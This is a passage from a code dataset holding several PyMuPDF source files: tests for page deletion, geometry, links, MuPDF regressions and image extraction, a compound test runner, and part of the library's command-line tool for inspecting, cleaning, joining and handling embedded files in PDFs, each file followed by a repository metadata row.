# insert this link on pages after first deleted one
link = {
"from": pymupdf.Rect(100, 100, 120, 120),
"kind": pymupdf.LINK_GOTO,
"page": r[0],
"to": pymupdf.Point(100, 100),
}
def test_deletion():
# First prepare the document.
doc = pymupdf.open()
toc = []
for i in range(page_count):
page = doc.new_page() # make a page
page.insert_text((100, 100), "%i" % i) # insert unique text
if i > r[0]: # insert a link
page.insert_link(link)
toc.append([1, "%i" % i, i + 1]) # TOC bookmark to this page
doc.set_toc(toc) # insert the TOC
assert doc.has_links() # check we did insert links
# Test page deletion.
# Delete pages in range and verify result
del doc[r]
assert not doc.has_links() # verify all links have gone
assert doc.page_count == page_count - len(r) # correct number deleted?
toc_new = doc.get_toc() # this is the modified TOC
# verify number of emptied items (have page number -1)
assert len([item for item in toc_new if item[-1] == -1]) == len(r)
# Deleted page numbers must correspond to TOC items with page number -1.
for i in r:
assert toc_new[i][-1] == -1
# Remaining pages must be correctly pointed to by the non-empty TOC items
for item in toc_new:
pno = item[-1]
if pno == -1: # one of the emptied items
continue
pno -= 1 # PDF page number
text = doc[pno].get_text().replace("\n", "")
# toc text must equal text on page
assert text == item[1]
doc.delete_page(0) # just for the coverage stats
del doc[5:10]
doc.select(range(doc.page_count))
doc.copy_page(0)
doc.move_page(0)
doc.fullcopy_page(0)
def test_3094():
path = os.path.abspath(f"{__file__}/../../tests/resources/test_2871.pdf")
document = pymupdf.open(path)
pnos = [i for i in range(0, document.page_count, 2)]
document.delete_pages(pnos)
def test_3150():
"""Assert correct functioning for problem file.
Implicitly also check use of new MuPDF function
pdf_rearrange_pages() since version 1.23.9.
"""
filename = os.path.join(scriptdir, "resources", "test-3150.pdf")
pages = [3, 3, 3, 2, 3, 1, 0, 0]
doc = pymupdf.open(filename)
doc.select(pages)
assert doc.page_count == len(pages)
| 3,156 | Python | .py | 79 | 35.278481 | 77 | 0.63761 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,371 | test_geometry.py | pymupdf_PyMuPDF/tests/test_geometry.py | """
* Check various construction methods of rects, points, matrices
* Check matrix inversions in variations
* Check algebra constructs
"""
import os
import pymupdf
def test_rect():
assert tuple(pymupdf.Rect()) == (0, 0, 0, 0)
if hasattr(pymupdf, 'mupdf'):
assert tuple(pymupdf.Rect(y0=12)) == (0, 12, 0, 0)
assert tuple(pymupdf.Rect(10, 20, 100, 200, x1=12)) == (10, 20, 12, 200)
p1 = pymupdf.Point(10, 20)
p2 = pymupdf.Point(100, 200)
p3 = pymupdf.Point(150, 250)
r = pymupdf.Rect(10, 20, 100, 200)
r_tuple = tuple(r)
assert tuple(pymupdf.Rect(p1, p2)) == r_tuple
assert tuple(pymupdf.Rect(p1, 100, 200)) == r_tuple
assert tuple(pymupdf.Rect(10, 20, p2)) == r_tuple
assert tuple(r.include_point(p3)) == (10, 20, 150, 250)
r = pymupdf.Rect(10, 20, 100, 200)
assert tuple(r.include_rect((100, 200, 110, 220))) == (10, 20, 110, 220)
r = pymupdf.Rect(10, 20, 100, 200)
# include empty rect makes no change
assert tuple(r.include_rect((0, 0, 0, 0))) == r_tuple
# include invalid rect makes no change
assert tuple(r.include_rect((1, 1, -1, -1))) == r_tuple
r = pymupdf.Rect()
for i in range(4):
r[i] = i + 1
assert r == pymupdf.Rect(1, 2, 3, 4)
assert pymupdf.Rect() / 5 == pymupdf.Rect()
assert pymupdf.Rect(1, 1, 2, 2) / pymupdf.Identity == pymupdf.Rect(1, 1, 2, 2)
failed = False
try:
r = pymupdf.Rect(1)
except:
failed = True
assert failed
failed = False
try:
r = pymupdf.Rect(1, 2, 3, 4, 5)
except:
failed = True
assert failed
failed = False
try:
r = pymupdf.Rect((1, 2, 3, 4, 5))
except:
failed = True
assert failed
failed = False
try:
r = pymupdf.Rect(1, 2, 3, "x")
except:
failed = True
assert failed
failed = False
try:
r = pymupdf.Rect()
r[5] = 1
except:
failed = True
assert failed
def test_irect():
p1 = pymupdf.Point(10, 20)
p2 = pymupdf.Point(100, 200)
p3 = pymupdf.Point(150, 250)
r = pymupdf.IRect(10, 20, 100, 200)
r_tuple = tuple(r)
assert tuple(pymupdf.IRect(p1, p2)) == r_tuple
assert tuple(pymupdf.IRect(p1, 100, 200)) == r_tuple
assert tuple(pymupdf.IRect(10, 20, p2)) == r_tuple
assert tuple(r.include_point(p3)) == (10, 20, 150, 250)
r = pymupdf.IRect(10, 20, 100, 200)
assert tuple(r.include_rect((100, 200, 110, 220))) == (10, 20, 110, 220)
r = pymupdf.IRect(10, 20, 100, 200)
# include empty rect makes no change
assert tuple(r.include_rect((0, 0, 0, 0))) == r_tuple
r = pymupdf.IRect()
for i in range(4):
r[i] = i + 1
assert r == pymupdf.IRect(1, 2, 3, 4)
failed = False
try:
r = pymupdf.IRect(1)
except:
failed = True
assert failed
failed = False
try:
r = pymupdf.IRect(1, 2, 3, 4, 5)
except:
failed = True
assert failed
failed = False
try:
r = pymupdf.IRect((1, 2, 3, 4, 5))
except:
failed = True
assert failed
failed = False
try:
r = pymupdf.IRect(1, 2, 3, "x")
except:
failed = True
assert failed
failed = False
try:
r = pymupdf.IRect()
r[5] = 1
except:
failed = True
assert failed
def test_inversion():
alpha = 255
m1 = pymupdf.Matrix(alpha)
m2 = pymupdf.Matrix(-alpha)
m3 = m1 * m2 # should equal identity matrix
assert abs(m3 - pymupdf.Identity) < pymupdf.EPSILON
m = pymupdf.Matrix(1, 0, 1, 0, 1, 0) # not invertible!
# inverted matrix must be zero
assert ~m == pymupdf.Matrix()
def test_matrix():
assert tuple(pymupdf.Matrix()) == (0, 0, 0, 0, 0, 0)
assert tuple(pymupdf.Matrix(90)) == (0, 1, -1, 0, 0, 0)
if hasattr(pymupdf, 'mupdf'):
assert tuple(pymupdf.Matrix(c=1)) == (0, 0, 1, 0, 0, 0)
assert tuple(pymupdf.Matrix(90, e=5)) == (0, 1, -1, 0, 5, 0)
m45p = pymupdf.Matrix(45)
m45m = pymupdf.Matrix(-45)
m90 = pymupdf.Matrix(90)
assert abs(m90 - m45p * m45p) < pymupdf.EPSILON
assert abs(pymupdf.Identity - m45p * m45m) < pymupdf.EPSILON
assert abs(m45p - ~m45m) < pymupdf.EPSILON
assert pymupdf.Matrix(2, 3, 1) == pymupdf.Matrix(1, 3, 2, 1, 0, 0)
m = pymupdf.Matrix(2, 3, 1)
m.invert()
assert abs(m * pymupdf.Matrix(2, 3, 1) - pymupdf.Identity) < pymupdf.EPSILON
assert pymupdf.Matrix(1, 1).pretranslate(2, 3) == pymupdf.Matrix(1, 0, 0, 1, 2, 3)
assert pymupdf.Matrix(1, 1).prescale(2, 3) == pymupdf.Matrix(2, 0, 0, 3, 0, 0)
assert pymupdf.Matrix(1, 1).preshear(2, 3) == pymupdf.Matrix(1, 3, 2, 1, 0, 0)
assert abs(pymupdf.Matrix(1, 1).prerotate(30) - pymupdf.Matrix(30)) < pymupdf.EPSILON
small = 1e-6
assert pymupdf.Matrix(1, 1).prerotate(90 + small) == pymupdf.Matrix(90)
assert pymupdf.Matrix(1, 1).prerotate(180 + small) == pymupdf.Matrix(180)
assert pymupdf.Matrix(1, 1).prerotate(270 + small) == pymupdf.Matrix(270)
assert pymupdf.Matrix(1, 1).prerotate(small) == pymupdf.Matrix(0)
assert pymupdf.Matrix(1, 1).concat(
pymupdf.Matrix(1, 2), pymupdf.Matrix(3, 4)
) == pymupdf.Matrix(3, 0, 0, 8, 0, 0)
assert pymupdf.Matrix(1, 2, 3, 4, 5, 6) / 1 == pymupdf.Matrix(1, 2, 3, 4, 5, 6)
assert m[0] == m.a
assert m[1] == m.b
assert m[2] == m.c
assert m[3] == m.d
assert m[4] == m.e
assert m[5] == m.f
m = pymupdf.Matrix()
for i in range(6):
m[i] = i + 1
assert m == pymupdf.Matrix(1, 2, 3, 4, 5, 6)
failed = False
try:
m = pymupdf.Matrix(1, 2, 3)
except:
failed = True
assert failed
failed = False
try:
m = pymupdf.Matrix(1, 2, 3, 4, 5, 6, 7)
except:
failed = True
assert failed
failed = False
try:
m = pymupdf.Matrix((1, 2, 3, 4, 5, 6, 7))
except:
failed = True
assert failed
failed = False
try:
m = pymupdf.Matrix(1, 2, 3, 4, 5, "x")
except:
failed = True
assert failed
failed = False
try:
m = pymupdf.Matrix(1, 0, 1, 0, 1, 0)
n = pymupdf.Matrix(1, 1) / m
except:
failed = True
assert failed
def test_point():
assert tuple(pymupdf.Point()) == (0, 0)
assert pymupdf.Point(1, -1).unit == pymupdf.Point(5, -5).unit
assert pymupdf.Point(-1, -1).abs_unit == pymupdf.Point(1, 1).unit
assert pymupdf.Point(1, 1).distance_to(pymupdf.Point(1, 1)) == 0
assert pymupdf.Point(1, 1).distance_to(pymupdf.Rect(1, 1, 2, 2)) == 0
assert pymupdf.Point().distance_to((1, 1, 2, 2)) > 0
failed = False
try:
p = pymupdf.Point(1, 2, 3)
except:
failed = True
assert failed
failed = False
try:
p = pymupdf.Point((1, 2, 3))
except:
failed = True
assert failed
failed = False
try:
p = pymupdf.Point(1, "x")
except:
failed = True
assert failed
failed = False
try:
p = pymupdf.Point()
p[3] = 1
except:
failed = True
assert failed
def test_algebra():
p = pymupdf.Point(1, 2)
m = pymupdf.Matrix(1, 2, 3, 4, 5, 6)
r = pymupdf.Rect(1, 1, 2, 2)
assert p + p == p * 2
assert p - p == pymupdf.Point()
assert m + m == m * 2
assert m - m == pymupdf.Matrix()
assert r + r == r * 2
assert r - r == pymupdf.Rect()
assert p + 5 == pymupdf.Point(6, 7)
assert m + 5 == pymupdf.Matrix(6, 7, 8, 9, 10, 11)
assert r.tl in r
assert r.tr not in r
assert r.br not in r
assert r.bl not in r
assert p * m == pymupdf.Point(12, 16)
assert r * m == pymupdf.Rect(9, 12, 13, 18)
assert (pymupdf.Rect(1, 1, 2, 2) & pymupdf.Rect(2, 2, 3, 3)).is_empty
assert not pymupdf.Rect(1, 1, 2, 2).intersects((2, 2, 4, 4))
failed = False
try:
x = m + p
except:
failed = True
assert failed
failed = False
try:
x = m + r
except:
failed = True
assert failed
failed = False
try:
x = p + r
except:
failed = True
assert failed
failed = False
try:
x = r + m
except:
failed = True
assert failed
assert m not in r
def test_quad():
r = pymupdf.Rect(10, 10, 20, 20)
q = r.quad
assert q.is_rectangular
assert not q.is_empty
assert q.is_convex
q *= pymupdf.Matrix(1, 1).preshear(2, 3)
assert not q.is_rectangular
assert not q.is_empty
assert q.is_convex
assert r.tl not in q
assert r not in q
assert r.quad not in q
failed = False
try:
q[5] = pymupdf.Point()
except:
failed = True
assert failed
failed = False
try:
q /= (1, 0, 1, 0, 1, 0)
except:
failed = True
assert failed
def test_pageboxes():
"""Tests concerning ArtBox, TrimBox, BleedBox."""
doc = pymupdf.open()
page = doc.new_page()
assert page.cropbox == page.artbox == page.bleedbox == page.trimbox
rect_methods = (
page.set_cropbox,
page.set_artbox,
page.set_bleedbox,
page.set_trimbox,
)
keys = ("CropBox", "ArtBox", "BleedBox", "TrimBox")
rect = pymupdf.Rect(100, 200, 400, 700)
for f in rect_methods:
f(rect)
for key in keys:
assert doc.xref_get_key(page.xref, key) == ("array", "[100 142 400 642]")
assert page.cropbox == page.artbox == page.bleedbox == page.trimbox
def test_3163():
b = {'number': 0, 'type': 0, 'bbox': (403.3577880859375, 330.8871765136719, 541.2731323242188, 349.5766296386719), 'lines': [{'spans': [{'size': 14.0, 'flags': 4, 'font': 'SFHello-Medium', 'color': 1907995, 'ascender': 1.07373046875, 'descender': -0.26123046875, 'text': 'Inclusion and diversity', 'origin': (403.3577880859375, 345.9194030761719), 'bbox': (403.3577880859375, 330.8871765136719, 541.2731323242188, 349.5766296386719)}], 'wmode': 0, 'dir': (1.0, 0.0), 'bbox': (403.3577880859375, 330.8871765136719, 541.2731323242188, 349.5766296386719)}]}
bbox = pymupdf.IRect(b["bbox"])
def test_3182():
pix = pymupdf.Pixmap(os.path.abspath(f'{__file__}/../../tests/resources/img-transparent.png'))
rect = pymupdf.Rect(0, 0, 100, 100)
pix.invert_irect(rect)
| 10,276 | Python | .py | 321 | 26.292835 | 558 | 0.587832 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,372 | test_page_links.py | pymupdf_PyMuPDF/tests/test_page_links.py | import pymupdf
import os
def test_page_links_generator():
# open some arbitrary PDF
path = os.path.abspath(f"{__file__}/../../tests/resources/2.pdf")
doc = pymupdf.open(path)
# select an arbitrary page
page = doc[-1]
# iterate over pages.links
link_generator = page.links()
links = list(link_generator)
assert len(links) == 7
| 367 | Python | .py | 12 | 26.166667 | 69 | 0.665714 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,373 | test_mupdf_regressions.py | pymupdf_PyMuPDF/tests/test_mupdf_regressions.py | import pymupdf
import os
from gentle_compare import gentle_compare
scriptdir = os.path.abspath(os.path.dirname(__file__))
def test_707448():
"""Confirm page content cleaning does not destroy page appearance."""
filename = os.path.join(scriptdir, "resources", "test-707448.pdf")
doc = pymupdf.open(filename)
page = doc[0]
words0 = page.get_text("words")
page.clean_contents(sanitize=True)
words1 = page.get_text("words")
assert gentle_compare(words0, words1)
def test_707673():
"""Confirm page content cleaning does not destroy page appearance.
Fails starting with MuPDF v1.23.9.
Fixed in:
commit 779b8234529cb82aa1e92826854c7bb98b19e44b (golden/master)
"""
filename = os.path.join(scriptdir, "resources", "test-707673.pdf")
doc = pymupdf.open(filename)
page = doc[0]
words0 = page.get_text("words")
page.clean_contents(sanitize=True)
words1 = page.get_text("words")
ok = gentle_compare(words0, words1)
if pymupdf.mupdf_version_tuple >= (1, 24, 1):
assert ok
else:
assert not ok
def test_707727():
"""Confirm page content cleaning does not destroy page appearance.
MuPDF issue: https://bugs.ghostscript.com/show_bug.cgi?id=707727
"""
filename = os.path.join(scriptdir, "resources", "test_3362.pdf")
doc = pymupdf.open(filename)
page = doc[0]
pix0 = page.get_pixmap()
page.clean_contents(sanitize=True)
page = doc.reload_page(page) # required to prevent re-use
pix1 = page.get_pixmap()
ok = pix0.samples == pix1.samples
if pymupdf.mupdf_version_tuple > (1, 24, 1):
assert ok
else:
assert not ok
if pymupdf.mupdf_version_tuple <= (1, 24, 1):
# We expect warnings.
wt = pymupdf.TOOLS.mupdf_warnings()
print(f"{wt=}")
assert wt
def test_707721():
"""Confirm text extraction works for nested MCID with Type 3 fonts.
PyMuPDF issue https://github.com/pymupdf/PyMuPDF/issues/3357
MuPDF issue: https://bugs.ghostscript.com/show_bug.cgi?id=707721
"""
if pymupdf.mupdf_version_tuple < (1, 24, 2):
print(
"test_707721(): not running because MuPDF-{pymupdf.mupdf_version} known to hang."
)
return
filename = os.path.join(scriptdir, "resources", "test_3357.pdf")
doc = pymupdf.open(filename)
page = doc[0]
ok = page.get_text()
assert ok
def test_3376():
"""Check fix of MuPDF bug 707733.
https://bugs.ghostscript.com/show_bug.cgi?id=707733
PyMuPDF issue https://github.com/pymupdf/PyMuPDF/issues/3376
Test file contains a redaction for the first 3 words: "Table of Contents".
Test strategy:
- extract all words (sorted)
- apply redactions
- extract words again
- confirm: we now have 3 words less and remaining words are equal.
"""
filename = os.path.join(scriptdir, "resources", "test_3376.pdf")
doc = pymupdf.open(filename)
page = doc[0]
words0 = page.get_text("words", sort=True)
words0_s = words0[:3] # first 3 words
words0_e = words0[3:] # remaining words
assert " ".join([w[4] for w in words0_s]) == "Table of Contents"
page.apply_redactions()
words1 = page.get_text("words", sort=True)
ok = gentle_compare(words0_e, words1)
if pymupdf.mupdf_version_tuple >= (1, 24, 2):
assert ok
else:
assert not ok
| 3,402 | Python | .py | 91 | 31.912088 | 93 | 0.668894 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,374 | run_compound.py | pymupdf_PyMuPDF/tests/run_compound.py | #! /usr/bin/env python3
'''
Runs a command using different implementations of PyMuPDF:
1. Run with rebased implementation of PyMuPDF.
2. As 1 but also set PYMUPDF_USE_EXTRA=0 to disable use of C++ optimisations.
Example usage:
./PyMuPDF/tests/run_compound.py python -m pytest -s PyMuPDF
Use `-i <implementations>` to select which implementations to use. In
`<implementations>`, `r` means rebased, `R` means rebased without
optimisations.
For example use the rebased and unoptimised rebased implementations with:
./PyMuPDF/tests/run_compound.py python -m pytest -s PyMuPDF
'''
import shlex
import os
import platform
import subprocess
import sys
import textwrap
import time
def log(text):
print(textwrap.indent(text, 'PyMuPDF:tests/run_compound.py: '))
sys.stdout.flush()
def log_star(text):
log('#' * 40)
log(text)
log('#' * 40)
def main():
implementations = 'rR'
timeout = None
i = 1
while i < len(sys.argv):
arg = sys.argv[i]
if arg == '-i':
i += 1
implementations = sys.argv[i]
elif arg == '-t':
i += 1
timeout = float(sys.argv[i])
elif arg.startswith('-'):
raise Exception(f'Unrecognised {arg=}.')
else:
break
i += 1
args = sys.argv[i:]
e_rebased = None
e_rebased_unoptimised = None
endtime = None
if timeout:
endtime = time.time() + timeout
# Check `implementations`.
implementations_seen = set()
for i in implementations:
assert i not in implementations_seen, f'Duplicate implementation {i!r} in {implementations!r}.'
if i == 'r':
name = 'rebased'
elif i == 'R':
name = 'rebased (unoptimised)'
else:
assert 0, f'Unrecognised implementation {i!r} in {implementations!r}.'
log(f' {i!r}: will run with PyMuPDF {name}.')
implementations_seen.add(i)
for i in implementations:
log(f'run_compound.py: {i=}')
timeout = None
if endtime:
timeout = max(0, endtime - time.time())
if i == 'r':
# Run with default `pymupdf` (rebased).
#
log_star( f'Running using pymupdf (rebased): {shlex.join(args)}')
e_rebased = subprocess.run( args, shell=0, check=0, timeout=timeout).returncode
elif i == 'R':
# Run with `pymupdf` (rebased) again, this time with PYMUPDF_USE_EXTRA=0.
#
env = os.environ.copy()
env[ 'PYMUPDF_USE_EXTRA'] = '0'
log_star(f'Running using pymupdf (rebased) with PYMUPDF_USE_EXTRA=0: {shlex.join(args)}')
e_rebased_unoptimised = subprocess.run( args, shell=0, check=0, env=env, timeout=timeout).returncode
else:
raise Exception(f'Unrecognised implementation {i!r}.')
if e_rebased is not None:
log(f'{e_rebased=}')
if e_rebased_unoptimised is not None:
log(f'{e_rebased_unoptimised=}')
if e_rebased or e_rebased_unoptimised:
log('Test(s) failed.')
return 1
if __name__ == '__main__':
try:
sys.exit(main())
except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as e:
# Terminate relatively quietly, failed commands will usually have
# generated diagnostics.
log(str(e))
sys.exit(1)
| 3,449 | Python | .py | 96 | 28.197917 | 112 | 0.613837 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,375 | test_extractimage.py | pymupdf_PyMuPDF/tests/test_extractimage.py | """
Extract images from a PDF file, confirm number of images found.
"""
import os
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "joined.pdf")
known_image_count = 21
def test_extract_image():
doc = pymupdf.open(filename)
image_count = 1
for xref in range(1, doc.xref_length() - 1):
if doc.xref_get_key(xref, "Subtype")[1] != "/Image":
continue
img = doc.extract_image(xref)
if isinstance(img, dict):
image_count += 1
assert image_count == known_image_count # this number is know about the file
def test_2348():
pdf_path = f'{scriptdir}/test_2348.pdf'
document = pymupdf.open()
page = document.new_page(width=500, height=842)
rect = pymupdf.Rect(20, 20, 480, 820)
page.insert_image(rect, filename=f'{scriptdir}/resources/nur-ruhig.jpg')
page = document.new_page(width=500, height=842)
page.insert_image(rect, filename=f'{scriptdir}/resources/img-transparent.png')
document.ez_save(pdf_path)
document.close()
document = pymupdf.open(pdf_path)
page = document[0]
imlist = page.get_images()
image = document.extract_image(imlist[0][0])
jpeg_extension = image['ext']
page = document[1]
imlist = page.get_images()
image = document.extract_image(imlist[0][0])
png_extension = image['ext']
print(f'jpeg_extension={jpeg_extension!r} png_extension={png_extension!r}')
assert jpeg_extension == 'jpeg'
assert png_extension == 'png'
def test_delete_image():
doc = pymupdf.open(os.path.abspath(f'{__file__}/../../tests/resources/test_delete_image.pdf'))
page = doc[0]
xref = page.get_images()[0][0]
page.delete_image(xref)
| 1,765 | Python | .py | 45 | 34.133333 | 98 | 0.671176 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,376 | __main__.py | pymupdf_PyMuPDF/src_classic/__main__.py | # -----------------------------------------------------------------------------
# Copyright 2020-2022, Harald Lieder, mailto:harald.lieder@outlook.com
# License: GNU AFFERO GPL 3.0, https://www.gnu.org/licenses/agpl-3.0.html
# Part of "PyMuPDF", Python bindings for "MuPDF" (http://mupdf.com), a
# lightweight PDF, XPS, and E-book viewer, renderer and toolkit which is
# maintained and developed by Artifex Software, Inc. https://artifex.com.
# -----------------------------------------------------------------------------
import argparse
import bisect
import os
import sys
import statistics
from typing import Dict, List, Set, Tuple
import fitz
from fitz.fitz import (
TEXT_INHIBIT_SPACES,
TEXT_PRESERVE_LIGATURES,
TEXT_PRESERVE_WHITESPACE,
)
mycenter = lambda x: (" %s " % x).center(75, "-")
def recoverpix(doc, item):
"""Return image for a given XREF."""
x = item[0] # xref of PDF image
s = item[1] # xref of its /SMask
if s == 0: # no smask: use direct image output
return doc.extract_image(x)
def getimage(pix):
if pix.colorspace.n != 4:
return pix
tpix = fitz.Pixmap(fitz.csRGB, pix)
return tpix
# we need to reconstruct the alpha channel with the smask
pix1 = fitz.Pixmap(doc, x)
pix2 = fitz.Pixmap(doc, s) # create pixmap of the /SMask entry
"""Sanity check:
- both pixmaps must have the same rectangle
- both pixmaps must have alpha=0
- pix2 must consist of 1 byte per pixel
"""
if not (pix1.irect == pix2.irect and pix1.alpha == pix2.alpha == 0 and pix2.n == 1):
print("Warning: unsupported /SMask %i for %i:" % (s, x))
print(pix2)
pix2 = None
return getimage(pix1) # return the pixmap as is
pix = fitz.Pixmap(pix1) # copy of pix1, with an alpha channel added
pix.set_alpha(pix2.samples) # treat pix2.samples as the alpha values
pix1 = pix2 = None # free temp pixmaps
# we may need to adjust something for CMYK pixmaps here:
return getimage(pix)
def open_file(filename, password, show=False, pdf=True):
"""Open and authenticate a document."""
doc = fitz.open(filename)
if not doc.is_pdf and pdf is True:
sys.exit("this command supports PDF files only")
rc = -1
if not doc.needs_pass:
return doc
if password:
rc = doc.authenticate(password)
if not rc:
sys.exit("authentication unsuccessful")
if show is True:
print("authenticated as %s" % "owner" if rc > 2 else "user")
else:
sys.exit("'%s' requires a password" % doc.name)
return doc
def print_dict(item):
"""Print a Python dictionary."""
l = max([len(k) for k in item.keys()]) + 1
for k, v in item.items():
msg = "%s: %s" % (k.rjust(l), v)
print(msg)
return
def print_xref(doc, xref):
"""Print an object given by XREF number.
Simulate the PDF source in "pretty" format.
For a stream also print its size.
"""
print("%i 0 obj" % xref)
xref_str = doc.xref_object(xref)
print(xref_str)
if doc.xref_is_stream(xref):
temp = xref_str.split()
try:
idx = temp.index("/Length") + 1
size = temp[idx]
if size.endswith("0 R"):
size = "unknown"
except:
size = "unknown"
print("stream\n...%s bytes" % size)
print("endstream")
print("endobj")
def get_list(rlist, limit, what="page"):
"""Transform a page / xref specification into a list of integers.
Args
----
rlist: (str) the specification
limit: maximum number, i.e. number of pages, number of objects
what: a string to be used in error messages
Returns
-------
A list of integers representing the specification.
"""
N = str(limit - 1)
rlist = rlist.replace("N", N).replace(" ", "")
rlist_arr = rlist.split(",")
out_list = []
for seq, item in enumerate(rlist_arr):
n = seq + 1
if item.isdecimal(): # a single integer
i = int(item)
if 1 <= i < limit:
out_list.append(int(item))
else:
sys.exit("bad %s specification at item %i" % (what, n))
continue
try: # this must be a range now, and all of the following must work:
i1, i2 = item.split("-") # will fail if not 2 items produced
i1 = int(i1) # will fail on non-integers
i2 = int(i2)
except:
sys.exit("bad %s range specification at item %i" % (what, n))
if not (1 <= i1 < limit and 1 <= i2 < limit):
sys.exit("bad %s range specification at item %i" % (what, n))
if i1 == i2: # just in case: a range of equal numbers
out_list.append(i1)
continue
if i1 < i2: # first less than second
out_list += list(range(i1, i2 + 1))
else: # first larger than second
out_list += list(range(i1, i2 - 1, -1))
return out_list
def show(args):
doc = open_file(args.input, args.password, True)
size = os.path.getsize(args.input) / 1024
flag = "KB"
if size > 1000:
size /= 1024
flag = "MB"
size = round(size, 1)
meta = doc.metadata
print(
"'%s', pages: %i, objects: %i, %g %s, %s, encryption: %s"
% (
args.input,
doc.page_count,
doc.xref_length() - 1,
size,
flag,
meta["format"],
meta["encryption"],
)
)
n = doc.is_form_pdf
if n > 0:
s = doc.get_sigflags()
print(
"document contains %i root form fields and is %ssigned"
% (n, "not " if s != 3 else "")
)
n = doc.embfile_count()
if n > 0:
print("document contains %i embedded files" % n)
print()
if args.catalog:
print(mycenter("PDF catalog"))
xref = doc.pdf_catalog()
print_xref(doc, xref)
print()
if args.metadata:
print(mycenter("PDF metadata"))
print_dict(doc.metadata)
print()
if args.xrefs:
print(mycenter("object information"))
xrefl = get_list(args.xrefs, doc.xref_length(), what="xref")
for xref in xrefl:
print_xref(doc, xref)
print()
if args.pages:
print(mycenter("page information"))
pagel = get_list(args.pages, doc.page_count + 1)
for pno in pagel:
n = pno - 1
xref = doc.page_xref(n)
print("Page %i:" % pno)
print_xref(doc, xref)
print()
if args.trailer:
print(mycenter("PDF trailer"))
print(doc.pdf_trailer())
print()
doc.close()
def clean(args):
doc = open_file(args.input, args.password, pdf=True)
encryption = args.encryption
encrypt = ("keep", "none", "rc4-40", "rc4-128", "aes-128", "aes-256").index(
encryption
)
if not args.pages: # simple cleaning
doc.save(
args.output,
garbage=args.garbage,
deflate=args.compress,
pretty=args.pretty,
clean=args.sanitize,
ascii=args.ascii,
linear=args.linear,
encryption=encrypt,
owner_pw=args.owner,
user_pw=args.user,
permissions=args.permission,
)
return
# create sub document from page numbers
pages = get_list(args.pages, doc.page_count + 1)
outdoc = fitz.open()
for pno in pages:
n = pno - 1
outdoc.insert_pdf(doc, from_page=n, to_page=n)
outdoc.save(
args.output,
garbage=args.garbage,
deflate=args.compress,
pretty=args.pretty,
clean=args.sanitize,
ascii=args.ascii,
linear=args.linear,
encryption=encrypt,
owner_pw=args.owner,
user_pw=args.user,
permissions=args.permission,
)
doc.close()
outdoc.close()
return
def doc_join(args):
"""Join pages from several PDF documents."""
doc_list = args.input # a list of input PDFs
doc = fitz.open() # output PDF
for src_item in doc_list: # process one input PDF
src_list = src_item.split(",")
password = src_list[1] if len(src_list) > 1 else None
src = open_file(src_list[0], password, pdf=True)
pages = ",".join(src_list[2:]) # get 'pages' specifications
if pages: # if anything there, retrieve a list of desired pages
page_list = get_list(",".join(src_list[2:]), src.page_count + 1)
else: # take all pages
page_list = range(1, src.page_count + 1)
for i in page_list:
doc.insert_pdf(src, from_page=i - 1, to_page=i - 1) # copy each source page
src.close()
doc.save(args.output, garbage=4, deflate=True)
doc.close()
def embedded_copy(args):
"""Copy embedded files between PDFs."""
doc = open_file(args.input, args.password, pdf=True)
if not doc.can_save_incrementally() and (
not args.output or args.output == args.input
):
sys.exit("cannot save PDF incrementally")
src = open_file(args.source, args.pwdsource)
names = set(args.name) if args.name else set()
src_names = set(src.embfile_names())
if names:
if not names <= src_names:
sys.exit("not all names are contained in source")
else:
names = src_names
if not names:
sys.exit("nothing to copy")
intersect = names & set(doc.embfile_names()) # any equal name already in target?
if intersect:
sys.exit("following names already exist in receiving PDF: %s" % str(intersect))
for item in names:
info = src.embfile_info(item)
buff = src.embfile_get(item)
doc.embfile_add(
item,
buff,
filename=info["filename"],
ufilename=info["ufilename"],
desc=info["desc"],
)
print("copied entry '%s' from '%s'" % (item, src.name))
src.close()
if args.output and args.output != args.input:
doc.save(args.output, garbage=3)
else:
doc.saveIncr()
doc.close()
def embedded_del(args):
"""Delete an embedded file entry."""
doc = open_file(args.input, args.password, pdf=True)
if not doc.can_save_incrementally() and (
not args.output or args.output == args.input
):
sys.exit("cannot save PDF incrementally")
try:
doc.embfile_del(args.name)
except ValueError:
sys.exit("no such embedded file '%s'" % args.name)
if not args.output or args.output == args.input:
doc.save_incr()
else:
doc.save(args.output, garbage=1)
doc.close()
def embedded_get(args):
"""Retrieve contents of an embedded file."""
doc = open_file(args.input, args.password, pdf=True)
try:
stream = doc.embfile_get(args.name)
d = doc.embfile_info(args.name)
except ValueError:
sys.exit("no such embedded file '%s'" % args.name)
filename = args.output if args.output else d["filename"]
output = open(filename, "wb")
output.write(stream)
output.close()
print("saved entry '%s' as '%s'" % (args.name, filename))
doc.close()
def embedded_add(args):
"""Insert a new embedded file."""
doc = open_file(args.input, args.password, pdf=True)
if not doc.can_save_incrementally() and (
args.output is None or args.output == args.input
):
sys.exit("cannot save PDF incrementally")
try:
doc.embfile_del(args.name)
sys.exit("entry '%s' already exists" % args.name)
except:
pass
if not os.path.exists(args.path) or not os.path.isfile(args.path):
sys.exit("no such file '%s'" % args.path)
stream = open(args.path, "rb").read()
filename = args.path
ufilename = filename
if not args.desc:
desc = filename
else:
desc = args.desc
doc.embfile_add(
args.name, stream, filename=filename, ufilename=ufilename, desc=desc
)
if not args.output or args.output == args.input:
doc.saveIncr()
else:
doc.save(args.output, garbage=3)
doc.close()
def embedded_upd(args):
"""Update contents or metadata of an embedded file."""
doc = open_file(args.input, args.password, pdf=True)
if not doc.can_save_incrementally() and (
args.output is None or args.output == args.input
):
sys.exit("cannot save PDF incrementally")
try:
doc.embfile_info(args.name)
except:
sys.exit("no such embedded file '%s'" % args.name)
if (
args.path is not None
and os.path.exists(args.path)
